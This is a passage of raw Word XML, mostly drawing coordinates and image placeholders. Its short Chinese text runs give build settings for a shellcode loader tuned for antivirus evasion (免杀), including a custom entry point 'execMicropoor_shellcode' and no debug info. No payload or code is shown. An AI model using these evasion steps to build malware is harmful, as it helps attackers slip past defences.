5280,1878,5281,1878,5281,1879,5281,1879,5281,1880,5281,1880,5282,1881,5282,1881,5282,1882,5283,1882,5283,1883,5283,1883,5283,1883,5284,1884,5284,1884,5284,1885,5285,1885,5285,1886,5285,1886,5286,1887,5286,1887,5286,1887,5287,1888,5287,1888,5287,1889,5288,1889,5288,1889,5288,1890,5289,1890,5289,1890,5290,1891,5290,1891,5291,1891,5291,1892,5291,1892,5292,1892,5292,1893,5293,1893,5293,1893,5294,1894,5294,1894,5295,1894,5295,1894,5296,1895,5296,1895,5296,1895,5297,1895,5298,1896,5298,1896,5299,1896,5299,1896,5300,1896,5300,1897,5301,1897,5301,1897,5302,1897,5302,1897,5303,1898,5304,1898,5304,1898,5305,1898,5305,1898,5306,1898,5307,1899,5307,1899,5308,1899,5308,1899,5309,1899,5310,1899,5310,1899,5311,1899,5312,1899,5312,1899,5313,1900,5314,1900,5314,1900,5315,1900,5316,1900,5317,1900,5317,1900,5318,1900,5319,1900,5319,1900,5320,1900,5321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,1900,5322e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:283.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,5670" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:5670;width:110;height:110" coordorigin="1790,5670" coordsize="110,110" path="m1900,5742l1900,5742,1900,5743,1900,5743,1900,5744,1900,5745,1900,5746,1900,5746,1900,5747,1900,5748,1900,5748,1900,5749,1900,5750,1899,5751,1899,5751,1899,5752,1899,5753,1899,5753,1899,5754,1899,5754,1899,5755,1899,5756,1899,5756,1898,5757,1898,5758,1898,5758,1898,5759,1898,5759,1898,5760,1897,5761,1897,5761,1897,5762,1897,5762,1897,5763,1896,5763,1896,5764,1896,5764,1896,5765,1896,5766,1895,5766,1895,5767,1895,5767,1895,5768,1894,5768,1894,5769,1894,5769,1894,5770,1893,5770,1893,5770,1893,5771,1892,5771,1892,5772,1892,5772,1891,5773,1891,5773,1891,5773,1890,5774,1890,5774,1890,5775,1889,5775,1889,5775,1889,5776,1888,5776,1888,5777,1887,5777,1887,5777,1887,5778,1886,5778,1886,5778,1885,5779,1885,5779,1884,5779,1884,5780,1883,5780,1883,5780,1883,5780,1882,5781,1882,5781,1881,5781,1881,5782,1880,5782,1880,5782,1879,5782,1879,5783,1878,5783,1878,5783,1877,5783,1876,5783,1876,5784,1875,5784,1875,5784,1874,5784,1874,5784,1873,5785,1872,5785,1872,5785,1871,5785,1871,5785,1870,5785,1869,5786,1869,5786,1868,5786,1868,5786,1867,5786,1866,5786,1866,5786,1865,5786,1864,5786,1864,5786,1863,5787,1862,5787,1861,5787,1861,5787,1860,5787,1859,5787,1859,5787,1858,5787,1857,5787,1856,5787,1856,5787,1855,5787,1855,5787,1854,5787,1853,5787,1853,5787,1852,5787,1851,5787,1851,5787,1850,5787,1849,5787,1848,5787,1848,5787,1847,5787,1846,5786,1846,5786,1845,5786,1844,5786,1844,5786,1843,5786,1842,5786,1842,5786,1841,5786,1840,5786,1840,5785,1839,5785,1839,5785,1838,5785,1837,5785,1837,5785,1836,5784,1836,5784,1835,5784,1835,5784,1834,5784,1833,5783,1833,5783,1832,5783,1832,5783,1831,5783,1831,5782,1830,5782,1830,5782,1829,5782,1829,5781,1828,5781,1828,5781,1827,5780,1827,5780,1826,5780,1826,5780,1825,5779,1825,5779,1825,5779,1824,5778,1824,5778,1823,5778,1823,5777,1823,5777,1822,5777,1822,5776,1821,5776,1821,5775,1821,5775,1820,5775,1820,5774,1820,5774,1819,5773,1819,5773,1819,5773,1818,5772,1818,5772,1818,5771,1817,5771,1817,5770,1817,5770,1816,5770,1816,5769,1816,5769,1816,5768,1815,5768,1815,5767,1815,5767,1815,5766,1814,5766,1814,5765,1814,5764,1814,5764,1813,5763,1813,5763,1813,5762,1813,5762,1813,5761,1812,5761,1812,5760,1812,5759,1812,5759,1812,5758,1812,5758,1811,5757,1811,5756,1811,5756,1811,5755,1811,5754,1811,5754,1811,5753,1811,5753,1811,5752,1810,5751,1810,5751,1810,5750,1810,5749,1810,5748,1810,5748,1810,5747,1810,5746,1810,5746,1810,5745,1810,5744,1810,5743,1810,5743,1810,5742,1810,5742,1810,5741,1810,5740,1810,5740,1810,5739,1810,5738,1810,5737,1810,5737,1810,5736,1810,5735,1810,5735,1810,5734,1810,5733,1810,5733,1811,5732,1811,5731,1811,5731,1811,5730,1811,5729,1811,5729,1811,5728,1811,5727,1811,5727,1812,5726,1812,5726,1812,5725,1812,5724,1812,5724,1812,5723,1813,5723,1813,5722,1813,5721,1813,5721,1813,5720,1814,5720,1814,5719,1814,5719,1814,5718,1815,5718,1815,5717,1815,5717,1815,5716,1816,5716,1816,5715,1816,5715,1816,5714,1817,5714,1817,5713,1817,5713,1818,5712,1818,5712,1818,5712,1819,5711,1819,5711,1819,5710,1820,5710,1820,5709,1820,5709,1821,5709,1821,5708,1821,5708,1822,5708,1822,5707,1823,5707,1823,5706,1823,5706,1824,5706,1824,5705,1825,5705,1825,5705,1825,5705,1826,5704,1826,5704,1827,5704,1827,5703,1828,5703,1828,5703,1829,5702,1829,5702,1830,5702,1830,5702,1831,5701,1831,5701,1832,5701,1832,5701,1833,5701,1833,5700,1834,5700,1835,5700,1835,5700,1836,5700,1836,5699,1837,5699,1837,5699,1838,5699,1839,5699,1839,5699,1840,5698,1840,5698,1841,5698,1842,5698,1842,5698,1843,5698,1844,5698,1844,5698,1845,5697,1846,5697,1846,5697,1847,5697,1848,5697,1848,5697,1849,5697,1850,5697,1851,5697,1851,5697,1852,5697,1853,5697,1853,5697,1854,5697,1855,5697,1855,5697,1856,5697,1856,5697,1857,5697,1858,5697,1859,5697,1859,5697,1860,5697,1861,5697,1861,5697,1862,5697,1863,5697,1864,5697,1864,5697,1865,5697,1866,5698,1866,5698,1867,5698,1868,5698,1868,5698,1869,5698,1869,5698,1870,5698,1871,5699,1871,5699,1872,5699,1872,5699,1873,5699,1874,5699,1874,5700,1875,5700,1875,5700,1876,5700,1876,5700,1877,5701,1878,5701,1878,5701,1879,5701,1879,5701,1880,5702,1880,5702,1881,5702,1881,5702,1882,5703,1882,5703,1883,5703,1883,5704,1883,5704,1884,5704,1884,5705,1885,5705,1885,5705,1886,5705,1886,5706,1887,5706,1887,5706,1887,5707,1888,5707,1888,5708,1889,5708,1889,5708,1889,5709,1890,5709,1890,5709,1890,5710,1891,5710,1891,5711,1891,5711,1892,5712,1892,5712,1892,5712,1893,5713,1893,5713,1893,5714,1894,5714,1894,5715,1894,5715,1894,5716,1895,5716,1895,5717,1895,5717,1895,5718,1896,5718,1896,5719,1896,5719,1896,5720,1896,5720,1897,5721,1897,5721,1897,5722,1897,5723,1897,5723,1898,5724,1898,5724,1898,5725,1898,5726,1898,5726,1898,5727,1899,5727,1899,5728,1899,5729,1899,5729,1899,5730,1899,5731,1899,5731,1899,5732,1899,5733,1899,5733,1900,5734,1900,5735,1900,5735,1900,5736,1900,5737,1900,5737,1900,5738,1900,5739,1900,5740,1900,5740,1900,5741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,1900,5742e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:304.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,6090" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:6090;width:110;height:110" coordorigin="1790,6090" coordsize="110,110" path="m1900,6162l1900,6162,1900,6163,1900,6164,1900,6164,1900,6165,1900,6166,1900,6167,1900,6167,1900,6168,1900,6169,1900,6169,1900,6170,1899,6171,1899,6171,1899,6172,1899,6173,1899,6173,1899,6174,1899,6175,1899,6175,1899,6176,1899,6177,1898,6177,1898,6178,1898,6178,1898,6179,1898,6180,1898,6180,1897,6181,1897,6181,1897,6182,1897,6183,1897,6183,1896,6184,1896,6184,1896,6185,1896,6185,1896,6186,1895,6186,1895,6187,1895,6187,1895,6188,1894,6188,1894,6189,1894,6189,1894,6190,1893,6190,1893,6191,1893,6191,1892,6192,1892,6192,1892,6192,1891,6193,1891,6193,1891,6194,1890,6194,1890,6195,1890,6195,1889,6195,1889,6196,1889,6196,1888,6196,1888,6197,1887,6197,1887,6198,1887,6198,1886,6198,1886,6199,1885,6199,1885,6199,1884,6199,1884,6200,1883,6200,1883,6200,1883,6201,1882,6201,1882,6201,1881,6202,1881,6202,1880,6202,1880,6202,1879,6203,1879,6203,1878,6203,1878,6203,1877,6203,1876,6204,1876,6204,1875,6204,1875,6204,1874,6204,1874,6205,1873,6205,1872,6205,1872,6205,1871,6205,1871,6205,1870,6206,1869,6206,1869,6206,1868,6206,1868,6206,1867,6206,1866,6206,1866,6206,1865,6207,1864,6207,1864,6207,1863,6207,1862,6207,1861,6207,1861,6207,1860,6207,1859,6207,1859,6207,1858,6207,1857,6207,1856,6207,1856,6207,1855,6207,1855,6207,1854,6207,1853,6207,1853,6207,1852,6207,1851,6207,1851,6207,1850,6207,1849,6207,1848,6207,1848,6207,1847,6207,1846,6207,1846,6207,1845,6207,1844,6206,1844,6206,1843,6206,1842,6206,1842,6206,1841,6206,1840,6206,1840,6206,1839,6205,1839,6205,1838,6205,1837,6205,1837,6205,1836,6205,1836,6204,1835,6204,1835,6204,1834,6204,1833,6204,1833,6203,1832,6203,1832,6203,1831,6203,1831,6203,1830,6202,1830,6202,1829,6202,1829,6202,1828,6201,1828,6201,1827,6201,1827,6200,1826,6200,1826,6200,1825,6199,1825,6199,1825,6199,1824,6199,1824,6198,1823,6198,1823,6198,1823,6197,1822,6197,1822,6196,1821,6196,1821,6196,1821,6195,1820,6195,1820,6195,1820,6194,1819,6194,1819,6193,1819,6193,1818,6192,1818,6192,1818,6192,1817,6191,1817,6191,1817,6190,1816,6190,1816,6189,1816,6189,1816,6188,1815,6188,1815,6187,1815,6187,1815,6186,1814,6186,1814,6185,1814,6185,1814,6184,1813,6184,1813,6183,1813,6183,1813,6182,1813,6181,1812,6181,1812,6180,1812,6180,1812,6179,1812,6178,1812,6178,1811,6177,1811,6177,1811,6176,1811,6175,1811,6175,1811,6174,1811,6173,1811,6173,1811,6172,1810,6171,1810,6171,1810,6170,1810,6169,1810,6169,1810,6168,1810,6167,1810,6167,1810,6166,1810,6165,1810,6164,1810,6164,1810,6163,1810,6162,1810,6162,1810,6161,1810,6161,1810,6160,1810,6159,1810,6158,1810,6158,1810,6157,1810,6156,1810,6156,1810,6155,1810,6154,1810,6153,1810,6153,1811,6152,1811,6151,1811,6151,1811,6150,1811,6150,1811,6149,1811,6148,1811,6148,1811,6147,1812,6146,1812,6146,1812,6145,1812,6145,1812,6144,1812,6143,1813,6143,1813,6142,1813,6142,1813,6141,1813,6141,1814,6140,1814,6140,1814,6139,1814,6138,1815,6138,1815,6137,1815,6137,1815,6136,1816,6136,1816,6135,1816,6135,1816,6134,1817,6134,1817,6134,1817,6133,1818,6133,1818,6132,1818,6132,1819,6131,1819,6131,1819,6131,1820,6130,1820,6130,1820,6129,1821,6129,1821,6129,1821,6128,1822,6128,1822,6127,1823,6127,1823,6127,1823,6126,1824,6126,1824,6126,1825,6125,1825,6125,1825,6125,1826,6124,1826,6124,1827,6124,1827,6124,1828,6123,1828,6123,1829,6123,1829,6122,1830,6122,1830,6122,1831,6122,1831,6121,1832,6121,1832,6121,1833,6121,1833,6121,1834,6120,1835,6120,1835,6120,1836,6120,1836,6120,1837,6119,1837,6119,1838,6119,1839,6119,1839,6119,1840,6119,1840,6118,1841,6118,1842,6118,1842,6118,1843,6118,1844,6118,1844,6118,1845,6118,1846,6118,1846,6118,1847,6117,1848,6117,1848,6117,1849,6117,1850,6117,1851,6117,1851,6117,1852,6117,1853,6117,1853,6117,1854,6117,1855,6117,1855,6117,1856,6117,1856,6117,1857,6117,1858,6117,1859,6117,1859,6117,1860,6117,1861,6117,1861,6117,1862,6117,1863,6117,1864,6118,1864,6118,1865,6118,1866,6118,1866,6118,1867,6118,1868,6118,1868,6118,1869,6118,1869,6118,1870,6119,1871,6119,1871,6119,1872,6119,1872,6119,1873,6119,1874,6120,1874,6120,1875,6120,1875,6120,1876,6120,1876,6121,1877,6121,1878,6121,1878,6121,1879,6121,1879,6122,1880,6122,1880,6122,1881,6122,1881,6123,1882,6123,1882,6123,1883,6124,1883,6124,1883,6124,1884,6124,1884,6125,1885,6125,1885,6125,1886,6126,1886,6126,1887,6126,1887,6127,1887,6127,1888,6127,1888,6128,1889,6128,1889,6129,1889,6129,1890,6129,1890,6130,1890,6130,1891,6131,1891,6131,1891,6131,1892,6132,1892,6132,1892,6133,1893,6133,1893,6134,1893,6134,1894,6134,1894,6135,1894,6135,1894,6136,1895,6136,1895,6137,1895,6137,1895,6138,1896,6138,1896,6139,1896,6140,1896,6140,1896,6141,1897,6141,1897,6142,1897,6142,1897,6143,1897,6143,1898,6144,1898,6145,1898,6145,1898,6146,1898,6146,1898,6147,1899,6148,1899,6148,1899,6149,1899,6150,1899,6150,1899,6151,1899,6151,1899,6152,1899,6153,1899,6153,1900,6154,1900,6155,1900,6156,1900,6156,1900,6157,1900,6158,1900,6158,1900,6159,1900,6160,1900,6161,1900,6161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,1900,6162e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:325.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,6510" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:6510;width:110;height:110" coordorigin="1790,6510" coordsize="110,110" path="m1900,6582l1900,6582,1900,6583,1900,6584,1900,6585,1900,6585,1900,6586,1900,6587,1900,6587,1900,6588,1900,6589,1900,6590,1900,6590,1899,6591,1899,6592,1899,6592,1899,6593,1899,6594,1899,6594,1899,6595,1899,6596,1899,6596,1899,6597,1898,6597,1898,6598,1898,6599,1898,6599,1898,6600,1898,6600,1897,6601,1897,6602,1897,6602,1897,6603,1897,6603,1896,6604,1896,6604,1896,6605,1896,6605,1896,6606,1895,6606,1895,6607,1895,6607,1895,6608,1894,6608,1894,6609,1894,6609,1894,6610,1893,6610,1893,6611,1893,6611,1892,6612,1892,6612,1892,6613,1891,6613,1891,6613,1891,6614,1890,6614,1890,6615,1890,6615,1889,6616,1889,6616,1889,6616,1888,6617,1888,6617,1887,6617,1887,6618,1887,6618,1886,6618,1886,6619,1885,6619,1885,6619,1884,6620,1884,6620,1883,6620,1883,6621,1883,6621,1882,6621,1882,6621,1881,6622,1881,6622,1880,6622,1880,6623,1879,6623,1879,6623,1878,6623,1878,6623,1877,6624,1876,6624,1876,6624,1875,6624,1875,6624,1874,6625,1874,6625,1873,6625,1872,6625,1872,6625,1871,6626,1871,6626,1870,6626,1869,6626,1869,6626,1868,6626,1868,6626,1867,6626,1866,6627,1866,6627,1865,6627,1864,6627,1864,6627,1863,6627,1862,6627,1861,6627,1861,6627,1860,6627,1859,6627,1859,6627,1858,6627,1857,6627,1856,6627,1856,6627,1855,6627,1855,6627,1854,6627,1853,6627,1853,6627,1852,6627,1851,6627,1851,6627,1850,6627,1849,6627,1848,6627,1848,6627,1847,6627,1846,6627,1846,6627,1845,6627,1844,6627,1844,6627,1843,6626,1842,6626,1842,6626,1841,6626,1840,6626,1840,6626,1839,6626,1839,6626,1838,6625,1837,6625,1837,6625,1836,6625,1836,6625,1835,6624,1835,6624,1834,6624,1833,6624,1833,6624,1832,6623,1832,6623,1831,6623,1831,6623,1830,6623,1830,6622,1829,6622,1829,6622,1828,6621,1828,6621,1827,6621,1827,6621,1826,6620,1826,6620,1825,6620,1825,6619,1825,6619,1824,6619,1824,6618,1823,6618,1823,6618,1823,6617,1822,6617,1822,6617,1821,6616,1821,6616,1821,6616,1820,6615,1820,6615,1820,6614,1819,6614,1819,6613,1819,6613,1818,6613,1818,6612,1818,6612,1817,6611,1817,6611,1817,6610,1816,6610,1816,6609,1816,6609,1816,6608,1815,6608,1815,6607,1815,6607,1815,6606,1814,6606,1814,6605,1814,6605,1814,6604,1813,6604,1813,6603,1813,6603,1813,6602,1813,6602,1812,6601,1812,6600,1812,6600,1812,6599,1812,6599,1812,6598,1811,6597,1811,6597,1811,6596,1811,6596,1811,6595,1811,6594,1811,6594,1811,6593,1811,6592,1810,6592,1810,6591,1810,6590,1810,6590,1810,6589,1810,6588,1810,6587,1810,6587,1810,6586,1810,6585,1810,6585,1810,6584,1810,6583,1810,6582,1810,6582,1810,6582,1810,6581,1810,6580,1810,6579,1810,6579,1810,6578,1810,6577,1810,6576,1810,6576,1810,6575,1810,6574,1810,6574,1810,6573,1811,6572,1811,6572,1811,6571,1811,6570,1811,6570,1811,6569,1811,6568,1811,6568,1811,6567,1812,6567,1812,6566,1812,6565,1812,6565,1812,6564,1812,6564,1813,6563,1813,6562,1813,6562,1813,6561,1813,6561,1814,6560,1814,6560,1814,6559,1814,6559,1815,6558,1815,6558,1815,6557,1815,6557,1816,6556,1816,6556,1816,6555,1816,6555,1817,6554,1817,6554,1817,6553,1818,6553,1818,6552,1818,6552,1819,6552,1819,6551,1819,6551,1820,6550,1820,6550,1820,6550,1821,6549,1821,6549,1821,6548,1822,6548,1822,6548,1823,6547,1823,6547,1823,6547,1824,6546,1824,6546,1825,6546,1825,6545,1825,6545,1826,6545,1826,6544,1827,6544,1827,6544,1828,6543,1828,6543,1829,6543,1829,6543,1830,6542,1830,6542,1831,6542,1831,6542,1832,6541,1832,6541,1833,6541,1833,6541,1834,6541,1835,6540,1835,6540,1836,6540,1836,6540,1837,6540,1837,6539,1838,6539,1839,6539,1839,6539,1840,6539,1840,6539,1841,6539,1842,6538,1842,6538,1843,6538,1844,6538,1844,6538,1845,6538,1846,6538,1846,6538,1847,6538,1848,6538,1848,6538,1849,6537,1850,6537,1851,6537,1851,6537,1852,6537,1853,6537,1853,6537,1854,6537,1855,6537,1855,6537,1856,6537,1856,6537,1857,6537,1858,6537,1859,6537,1859,6537,1860,6537,1861,6537,1861,6538,1862,6538,1863,6538,1864,6538,1864,6538,1865,6538,1866,6538,1866,6538,1867,6538,1868,6538,1868,6538,1869,6539,1869,6539,1870,6539,1871,6539,1871,6539,1872,6539,1872,6539,1873,6540,1874,6540,1874,6540,1875,6540,1875,6540,1876,6541,1876,6541,1877,6541,1878,6541,1878,6541,1879,6542,1879,6542,1880,6542,1880,6542,1881,6543,1881,6543,1882,6543,1882,6543,1883,6544,1883,6544,1883,6544,1884,6545,1884,6545,1885,6545,1885,6546,1886,6546,1886,6546,1887,6547,1887,6547,1887,6547,1888,6548,1888,6548,1889,6548,1889,6549,1889,6549,1890,6550,1890,6550,1890,6550,1891,6551,1891,6551,1891,6552,1892,6552,1892,6552,1892,6553,1893,6553,1893,6554,1893,6554,1894,6555,1894,6555,1894,6556,1894,6556,1895,6557,1895,6557,1895,6558,1895,6558,1896,6559,1896,6559,1896,6560,1896,6560,1896,6561,1897,6561,1897,6562,1897,6562,1897,6563,1897,6564,1898,6564,1898,6565,1898,6565,1898,6566,1898,6567,1898,6567,1899,6568,1899,6568,1899,6569,1899,6570,1899,6570,1899,6571,1899,6572,1899,6572,1899,6573,1899,6574,1900,6574,1900,6575,1900,6576,1900,6576,1900,6577,1900,6578,1900,6579,1900,6579,1900,6580,1900,6581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,1900,6582e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:89.500pt;margin-top:346.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1790,6930" coordsize="110,110">
        <v:shape style="position:absolute;left:1790;top:6930;width:110;height:110" coordorigin="1790,6930" coordsize="110,110" path="m1900,7003l1900,7003,1900,7003,1900,7004,1900,7005,1900,7006,1900,7006,1900,7007,1900,7008,1900,7008,1900,7009,1900,7010,1900,7010,1899,7011,1899,7012,1899,7012,1899,7013,1899,7014,1899,7014,1899,7015,1899,7016,1899,7016,1899,7017,1898,7018,1898,7018,1898,7019,1898,7019,1898,7020,1898,7021,1897,7021,1897,7022,1897,7022,1897,7023,1897,7023,1896,7024,1896,7025,1896,7025,1896,7026,1896,7026,1895,7027,1895,7027,1895,7028,1895,7028,1894,7029,1894,7029,1894,7030,1894,7030,1893,7031,1893,7031,1893,7032,1892,7032,1892,7032,1892,7033,1891,7033,1891,7034,1891,7034,1890,7035,1890,7035,1890,7035,1889,7036,1889,7036,1889,7036,1888,7037,1888,7037,1887,7038,1887,7038,1887,7038,1886,7039,1886,7039,1885,7039,1885,7040,1884,7040,1884,7040,1883,7041,1883,7041,1883,7041,1882,7041,1882,7042,1881,7042,1881,7042,1880,7042,1880,7043,1879,7043,1879,7043,1878,7043,1878,7044,1877,7044,1876,7044,1876,7044,1875,7044,1875,7045,1874,7045,1874,7045,1873,7045,1872,7045,1872,7046,1871,7046,1871,7046,1870,7046,1869,7046,1869,7046,1868,7046,1868,7047,1867,7047,1866,7047,1866,7047,1865,7047,1864,7047,1864,7047,1863,7047,1862,7047,1861,7047,1861,7047,1860,7047,1859,7047,1859,7047,1858,7047,1857,7048,1856,7048,1856,7048,1855,7048,1855,7048,1854,7048,1853,7048,1853,7048,1852,7047,1851,7047,1851,7047,1850,7047,1849,7047,1848,7047,1848,7047,1847,7047,1846,7047,1846,7047,1845,7047,1844,7047,1844,7047,1843,7047,1842,7047,1842,7046,1841,7046,1840,7046,1840,7046,1839,7046,1839,7046,1838,7046,1837,7045,1837,7045,1836,7045,1836,7045,1835,7045,1835,7044,1834,7044,1833,7044,1833,7044,1832,7044,1832,7043,1831,7043,1831,7043,1830,7043,1830,7042,1829,7042,1829,7042,1828,7042,1828,7041,1827,7041,1827,7041,1826,7041,1826,7040,1825,7040,1825,7040,1825,7039,1824,7039,1824,7039,1823,7038,1823,7038,1823,7038,1822,7037,1822,7037,1821,7036,1821,7036,1821,7036,1820,7035,1820,7035,1820,7035,1819,7034,1819,7034,1819,7033,1818,7033,1818,7032,1818,7032,1817,7032,1817,7031,1817,7031,1816,7030,1816,7030,1816,7029,1816,7029,1815,7028,1815,7028,1815,7027,1815,7027,1814,7026,1814,7026,1814,7025,1814,7025,1813,7024,1813,7023,1813,7023,1813,7022,1813,7022,1812,7021,1812,7021,1812,7020,1812,7019,1812,7019,1812,7018,1811,7018,1811,7017,1811,7016,1811,7016,1811,7015,1811,7014,1811,7014,1811,7013,1811,7012,1810,7012,1810,7011,1810,7010,1810,7010,1810,7009,1810,7008,1810,7008,1810,7007,1810,7006,1810,7006,1810,7005,1810,7004,1810,7003,1810,7003,1810,7003,1810,7002,1810,7001,1810,7000,1810,7000,1810,6999,1810,6998,1810,6997,1810,6997,1810,6996,1810,6995,1810,6995,1810,6994,1810,6993,1811,6993,1811,6992,1811,6991,1811,6991,1811,6990,1811,6989,1811,6989,1811,6988,1811,6987,1812,6987,1812,6986,1812,6986,1812,6985,1812,6984,1812,6984,1813,6983,1813,6983,1813,6982,1813,6982,1813,6981,1814,6980,1814,6980,1814,6979,1814,6979,1815,6978,1815,6978,1815,6977,1815,6977,1816,6976,1816,6976,1816,6975,1816,6975,1817,6974,1817,6974,1817,6974,1818,6973,1818,6973,1818,6972,1819,6972,1819,6971,1819,6971,1820,6971,1820,6970,1820,6970,1821,6969,1821,6969,1821,6969,1822,6968,1822,6968,1823,6967,1823,6967,1823,6967,1824,6966,1824,6966,1825,6966,1825,6965,1825,6965,1826,6965,1826,6965,1827,6964,1827,6964,1828,6964,1828,6963,1829,6963,1829,6963,1830,6963,1830,6962,1831,6962,1831,6962,1832,6962,1832,6961,1833,6961,1833,6961,1834,6961,1835,6961,1835,6960,1836,6960,1836,6960,1837,6960,1837,6960,1838,6959,1839,6959,1839,6959,1840,6959,1840,6959,1841,6959,1842,6959,1842,6959,1843,6958,1844,6958,1844,6958,1845,6958,1846,6958,1846,6958,1847,6958,1848,6958,1848,6958,1849,6958,1850,6958,1851,6958,1851,6958,1852,6958,1853,6958,1853,6958,1854,6958,1855,6958,1855,6958,1856,6958,1856,6958,1857,6958,1858,6958,1859,6958,1859,6958,1860,6958,1861,6958,1861,6958,1862,6958,1863,6958,1864,6958,1864,6958,1865,6958,1866,6958,1866,6958,1867,6958,1868,6959,1868,6959,1869,6959,1869,6959,1870,6959,1871,6959,1871,6959,1872,6959,1872,6960,1873,6960,1874,6960,1874,6960,1875,6960,1875,6961,1876,6961,1876,6961,1877,6961,1878,6961,1878,6962,1879,6962,1879,6962,1880,6962,1880,6963,1881,6963,1881,6963,1882,6963,1882,6964,1883,6964,1883,6964,1883,6965,1884,6965,1884,6965,1885,6965,1885,6966,1886,6966,1886,6966,1887,6967,1887,6967,1887,6967,1888,6968,1888,6968,1889,6969,1889,6969,1889,6969,1890,6970,1890,6970,1890,6971,1891,6971,1891,6971,1891,6972,1892,6972,1892,6973,1892,6973,1893,6974,1893,6974,1893,6974,1894,6975,1894,6975,1894,6976,1894,6976,1895,6977,1895,6977,1895,6978,1895,6978,1896,6979,1896,6979,1896,6980,1896,6980,1896,6981,1897,6982,1897,6982,1897,6983,1897,6983,1897,6984,1898,6984,1898,6985,1898,6986,1898,6986,1898,6987,1898,6987,1899,6988,1899,6989,1899,6989,1899,6990,1899,6991,1899,6991,1899,6992,1899,6993,1899,6993,1899,6994,1900,6995,1900,6995,1900,6996,1900,6997,1900,6997,1900,6998,1900,6999,1900,7000,1900,7000,1900,7001,1900,7002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,1900,7003e x" fillcolor="#000000" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:400.800pt;width:458.400pt;height:143.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId20" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:584.400pt;width:467.400pt;height:153.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId21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01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-1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>优化：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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>优化的过程中，需要确保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2307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性能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2307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稳定性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2307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大小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2307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可塑性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2307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免杀性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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>非</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>算法，故优化/01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43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无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用预编译头，故否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68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无</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>需调试信息，故否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69.599pt;width:467.400pt;height:170.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId22" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:300.600pt;width:467.400pt;height:186.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId23" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:548.400pt;width:467.400pt;height:39.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId24" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:648.600pt;width:270.600pt;height:62.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId25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6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5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>自定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>入口点：execMicropoor_shellcode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18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再</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>次编译：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92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6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
